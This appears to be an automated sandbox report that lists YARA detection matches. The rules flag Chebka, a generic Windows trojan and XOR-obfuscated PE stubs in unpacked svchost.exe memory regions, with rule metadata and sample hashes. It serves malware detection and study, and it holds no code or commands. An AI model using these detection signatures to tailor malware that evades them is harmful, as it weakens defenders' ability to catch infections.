        Source: 11.0.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 25.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 25.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 25.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 35.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 35.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 35.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 18.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 18.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 18.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 28.2.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 28.2.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 28.2.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 30.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 30.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 30.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 19.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 19.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 19.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 36.0.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 36.0.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 36.0.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 32.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 32.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 32.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 29.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 29.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 29.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 28.2.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 28.2.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 28.2.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 33.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 33.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 33.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 27.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 27.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 27.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 25.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 25.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 25.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 36.0.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 36.0.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 36.0.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 20.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 20.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 20.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 11.2.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 11.2.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 11.2.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 20.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 20.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 20.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 32.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 32.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 32.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 22.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 22.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 22.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 17.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 17.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 17.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 28.0.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 28.0.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 28.0.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 23.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 23.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 23.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 36.2.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 36.2.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 36.2.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 27.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 27.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 27.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 37.0.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 37.0.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 37.0.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 32.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 32.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 32.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 7.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 7.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 7.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 9.2.svchost.exe.244fc400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 9.2.svchost.exe.244fc400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 9.2.svchost.exe.244fc400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 22.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 22.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 34.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 22.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 34.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
